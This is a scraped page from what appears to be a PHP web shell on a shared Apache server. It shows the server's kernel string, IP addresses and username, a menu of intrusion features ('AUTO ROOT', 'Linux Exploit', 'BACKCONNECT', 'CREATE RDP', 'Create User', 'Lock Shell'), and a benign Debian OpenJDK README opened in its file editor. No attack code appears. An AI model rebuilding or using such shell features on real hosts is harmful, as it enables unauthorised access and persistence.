Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
openjdk-8-jre-headless /
[ HOME SHELL ]
Name
Size
Permission
Action
test-amd64
[ DIR ]
drwxr-xr-x
JAVA_HOME
440
B
-rw-r--r--
NEWS.Debian.gz
9.14
KB
-rw-r--r--
README.Debian
2.38
KB
-rw-r--r--
README.alternatives
1.09
KB
-rw-r--r--
changelog.Debian.gz
69.66
KB
-rw-r--r--
copyright
90.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.alternatives
Updating alternatives for JRE/JDK installations ----------------------------------------------- Packages providing a runtime or a development environment for the Java language all use symlinks in the /etc/alternatives directory to enable the system administrator to choose which programs to use for java, javac, javah, etc. The update-java-alternatives script can be used to set all the JRE/JDK alternatives: First, you have to decide which Java implementation to default to. update-java-alternatives --list tells about the available runtime and/or development environments. The first column shows the names to be used in for the following examples. - Set all runtime tools to point to the <jname> alternatives: update-java-alternatives --jre --set <jname> - Set all runtime tools (headless only) to point to the <jname> alternatives: update-java-alternatives --jre-headless --set <jname> - Set all runtime and development tools to point to the <jname> alternatives: update-java-alternatives --set <jname> - Set all runtime and development tools to auto mode: update-java-alternatives --auto
Close